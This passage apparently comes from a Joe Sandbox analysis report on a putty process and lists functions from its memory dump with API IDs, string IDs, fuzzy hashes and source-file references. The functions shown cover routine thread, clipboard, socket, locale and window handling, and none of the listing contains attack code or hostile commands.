                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
                                                          • String ID:
                                                          • API String ID: 2660700835-0
                                                          • Opcode ID: 7060ef1db19765c15ecb51764c18f4acb629c402f03a042797fbfc53073bf9f0
                                                          • Instruction ID: 98c79edd97168dbaaf4651d9b6817388271225403e78bfd8f13664bd535ed174
                                                          • Opcode Fuzzy Hash: 7060ef1db19765c15ecb51764c18f4acb629c402f03a042797fbfc53073bf9f0
                                                          • Instruction Fuzzy Hash: 6931D073A15A02A6F714EB21F850B66F3A0FB49750FC48235DA8E06BA0DF3EE444D714
                                                          Function 00007FF738AA6C70 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
                                                          • String ID:
                                                          • API String ID: 2660700835-0
                                                          • Opcode ID: 7fe7e6c4e41e634ff9d831d6de080e10820e0ba925a2b53643a80e04d0fe4817
                                                          • Instruction ID: 395d63b14c271dc334f3b287745596ef9c4fbc6bc313206409fe3bba6d17b962
                                                          • Opcode Fuzzy Hash: 7fe7e6c4e41e634ff9d831d6de080e10820e0ba925a2b53643a80e04d0fe4817
                                                          • Instruction Fuzzy Hash: 8431E173619A4256FB20EB25B810766F3A0FB49754FC44235DA8E06BA0DF3EE444D718
                                                          Function 00007FF738A3BDC0 Relevance: 7.5, APIs: 5, Instructions: 27clipboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Data$CloseMessageOpenSend
                                                          • String ID:
                                                          • API String ID: 2111581930-0
                                                          • Opcode ID: 3ad230ff7c130997384676ac3547f4b790b6b67814630b7e8cf481d053b7648c
                                                          • Instruction ID: 27ee472dbf5c711c4c628b934b5bc714dcf6650fe500918e066427b2780e9976
                                                          • Opcode Fuzzy Hash: 3ad230ff7c130997384676ac3547f4b790b6b67814630b7e8cf481d053b7648c
                                                          • Instruction Fuzzy Hash: 40F08252B1E11363FB983B61E804774D2919F05F40F944139C90E062D0DD7FAC86A329
                                                          Function 00007FF738A74050 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF738A69A4B), ref: 00007FF738A740FB
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF738A69A4B), ref: 00007FF738A74124
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID: (unable to format: FormatMessage returned %u)$Error %d: %s
                                                          • API String ID: 3479602957-1777221902
                                                          • Opcode ID: 833ec2e719c5a8fa5ee69bff0c0a85f0dfc4d70319f666af26bbd7d7a4d80826
                                                          • Instruction ID: c817cbb8e79631979cad71cecc7eaaa46f53d1570736dd20c05a5aae962345f4
                                                          • Opcode Fuzzy Hash: 833ec2e719c5a8fa5ee69bff0c0a85f0dfc4d70319f666af26bbd7d7a4d80826
                                                          • Instruction Fuzzy Hash: 7A31C463A0A64366EB50FB10E4507AAE3A0FF84344F804131FA8D43B95DF3EE505AB18
                                                          Function 00007FF738A3A356 Relevance: 6.2, APIs: 4, Instructions: 232COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Color$ModeObjectSelectText
                                                          • String ID:
                                                          • API String ID: 3594386986-0
                                                          • Opcode ID: 908287c952c19077702fa72e75881eff9a37e9d8844351ad772059503a0a4c29
                                                          • Instruction ID: 8353a816955a0d9dc8ed805222a7813cb652f560bd600affa1af9fe08700c0fa
                                                          • Opcode Fuzzy Hash: 908287c952c19077702fa72e75881eff9a37e9d8844351ad772059503a0a4c29
                                                          • Instruction Fuzzy Hash: 83A12833E09BA586E7249A15E48077EF3E1F784741F524035D98E83B94EFBEE800AB14
                                                          Function 00007FF738A3A37A Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Color$ModeObjectSelectText
                                                          • String ID:
                                                          • API String ID: 3594386986-0
                                                          • Opcode ID: 1388d1588876b3c84cfd86371b46ce0b701140e2fef23bf9d90feba35a8186a3
                                                          • Instruction ID: 857c956391e6f0fac3a166e299a8f88beaec9150826f24cc721080a7282b7320
                                                          • Opcode Fuzzy Hash: 1388d1588876b3c84cfd86371b46ce0b701140e2fef23bf9d90feba35a8186a3
                                                          • Instruction Fuzzy Hash: 1F912933E09BA586E7249A15E48077EF3E1F784741F524035D98D83B94EFBEE800AB14
                                                          Function 00007FF738A3A36E Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Color$ModeObjectSelectText
                                                          • String ID:
                                                          • API String ID: 3594386986-0
                                                          • Opcode ID: 7f041fe45775f78923f1fea1f2459b20f4022d21d3e22c60ad8540e4319e1bac
                                                          • Instruction ID: 2db60d6fe3934d7affcc3e68fcb5aff9a1cf4c01816874f2d4d12ca3b4c85131
                                                          • Opcode Fuzzy Hash: 7f041fe45775f78923f1fea1f2459b20f4022d21d3e22c60ad8540e4319e1bac
                                                          • Instruction Fuzzy Hash: 53912833E09BA586E7249A15E48077EF3E1F784741F524035D98D83B94EFBEE801AB54
                                                          Function 00007FF738A6B2F0 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: HandleInformationIoctlhtonlsocket
                                                          • String ID:
                                                          • API String ID: 8079943-0
                                                          • Opcode ID: 506b895b711262b3b44b3e305ad8d392f31a4dd7883a8d92971d1b63d6712cd2
                                                          • Instruction ID: 231a815d06e0a68add03943f4cee71d1bb8c8e4c6ed12f8b0ae19db13ee1afb1
                                                          • Opcode Fuzzy Hash: 506b895b711262b3b44b3e305ad8d392f31a4dd7883a8d92971d1b63d6712cd2
                                                          • Instruction Fuzzy Hash: D7315863B1970352FB10AB14A894B26E390FF84750F844331EE6D02B94EF3EE8029718
                                                          Function 00007FF738A73F30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: GetVersionExA$kernel32.dll
                                                          • API String ID: 190572456-3521452493
                                                          • Opcode ID: e5e72548265e7f96df9fae9cf58ccdf3b2b7064ccbcd80e6b3c0d44bdad61ba3
                                                          • Instruction ID: 36bc85277175508d5135c77cf920487c3dd5ab7c62972df11b9dc9e15651fac0
                                                          • Opcode Fuzzy Hash: e5e72548265e7f96df9fae9cf58ccdf3b2b7064ccbcd80e6b3c0d44bdad61ba3
                                                          • Instruction Fuzzy Hash: 3D31BE63C1D78395FA20EB20A850775E3A0FBD5340F809335E48D46AA0DF7EA580EF29
                                                          Function 00007FF738B00CD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: GetLocaleInfoEx
                                                          • API String ID: 2299586839-2904428671
                                                          • Opcode ID: 59ff538c47892b8b6aee5ed328f17144b1867bbd12944e6f395b2219c5e7c683
                                                          • Instruction ID: 808ab26eec78093038f3e35ccbc0ce012c890fb783099b1ef757c0a16c6de2ee
                                                          • Opcode Fuzzy Hash: 59ff538c47892b8b6aee5ed328f17144b1867bbd12944e6f395b2219c5e7c683
                                                          • Instruction Fuzzy Hash: 6F01F762F08A83A5E714AB52B4004A6F360EF84BC0F984435DE4D03B75CF3DE945D356
                                                          Function 00007FF738A39A40 Relevance: 3.0, APIs: 2, Instructions: 50windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: IconicTextWindow
                                                          • String ID:
                                                          • API String ID: 3799979766-0
                                                          • Opcode ID: 408b331ab1dcf6ca5f31c9989a6274de3cf700b866e0d3a90a5c951d209dc1cb
                                                          • Instruction ID: 9ed9cdf9e60058b38d2bc650d98b05df3490e5eb45f94f61c628ecc3a3a0dd0e
                                                          • Opcode Fuzzy Hash: 408b331ab1dcf6ca5f31c9989a6274de3cf700b866e0d3a90a5c951d209dc1cb
                                                          • Instruction Fuzzy Hash: 8C11E323F0A642A2F9547723F9101BAD350AF85BD0F884431CE4E47795DE3EE882A324
                                                          Function 00007FF738A39980 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: IconicTextWindow
                                                          • String ID:
                                                          • API String ID: 3799979766-0
                                                          • Opcode ID: e8da70780ab1128e960b925990c824963da932b0047884525f4baf3b9a53758f
                                                          • Instruction ID: c326ffa2351f858a51e9132c20a42c7c89d13fe471f591a9bf83349996bbac6e
                                                          • Opcode Fuzzy Hash: e8da70780ab1128e960b925990c824963da932b0047884525f4baf3b9a53758f
                                                          • Instruction Fuzzy Hash: 6B11E323E0A543A2FB54B722B9101BED3909F85BD0F844031CF4E43795DE3EE882A324
                                                          Function 00007FF738A31947 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ContextWindow$CaretCompositionInfoLocaleProcRelease
                                                          • String ID:
                                                          • API String ID: 2999936390-0
                                                          • Opcode ID: cecc27aaded33fbd0a65ba9d9e6745d016473db857afed0fe483ebeeb25ca29e
                                                          • Instruction ID: 5061a2698cb891e812e961cec9f4001fed9272f05170c44cd4df77fee682e780
                                                          • Opcode Fuzzy Hash: cecc27aaded33fbd0a65ba9d9e6745d016473db857afed0fe483ebeeb25ca29e
                                                          • Instruction Fuzzy Hash: 92F0B467B0A18665F512F702A8117F9E250AF89FD5FC00432CE0E177C6DD3E9547AB24
                                                          Function 00007FF738B08344 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738B019C8: GetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019D7
                                                            • Part of subcall function 00007FF738B019C8: FlsGetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019EC
                                                            • Part of subcall function 00007FF738B019C8: SetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A77
                                                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF738B08147,00000000,00000092,?,?,00000000,?,?,00007FF738AF7139), ref: 00007FF738B083E2
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystemValue
                                                          • String ID:
                                                          • API String ID: 3029459697-0
                                                          • Opcode ID: d39098f4ffb5a12ddc571da42d27e3254cf996b14ceabd108672cbc0bf23f421
                                                          • Instruction ID: be2418fbeb09ed22591aac75ed306f49a71959b607f10f8c299db06ed9916707
                                                          • Opcode Fuzzy Hash: d39098f4ffb5a12ddc571da42d27e3254cf996b14ceabd108672cbc0bf23f421
                                                          • Instruction Fuzzy Hash: E11124A3A08606DAEB14AF15D440AADFBA1FB84FE0F848135D669433C0CF39D6D1D712
                                                          Function 00007FF738B08660 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738B019C8: GetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019D7
                                                            • Part of subcall function 00007FF738B019C8: FlsGetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019EC
                                                            • Part of subcall function 00007FF738B019C8: SetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A77
                                                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF738B08103,00000000,00000092,?,?,00000000,?,?,00007FF738AF7139), ref: 00007FF738B086DE
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystemValue
                                                          • String ID:
                                                          • API String ID: 3029459697-0
                                                          • Opcode ID: 79cb653b59e46dd198ba737fbf93d3d9359592602071ca320246555f21d9c4aa
                                                          • Instruction ID: 4a584be30ffeb25ec5092731cc6efd0e1de87b6f4adc1630c68d07e821bb0f1b
                                                          • Opcode Fuzzy Hash: 79cb653b59e46dd198ba737fbf93d3d9359592602071ca320246555f21d9c4aa
                                                          • Instruction Fuzzy Hash: 3401F5B3E0824396EB106B15E840BB9F291EB407A4F868231C279432D4CF3A9581D71B
                                                          Function 00007FF738B0180C Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF738B00BE7,?,?,?,?,?,?,?,?,00000000,00007FF738B07D6C), ref: 00007FF738B0185B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
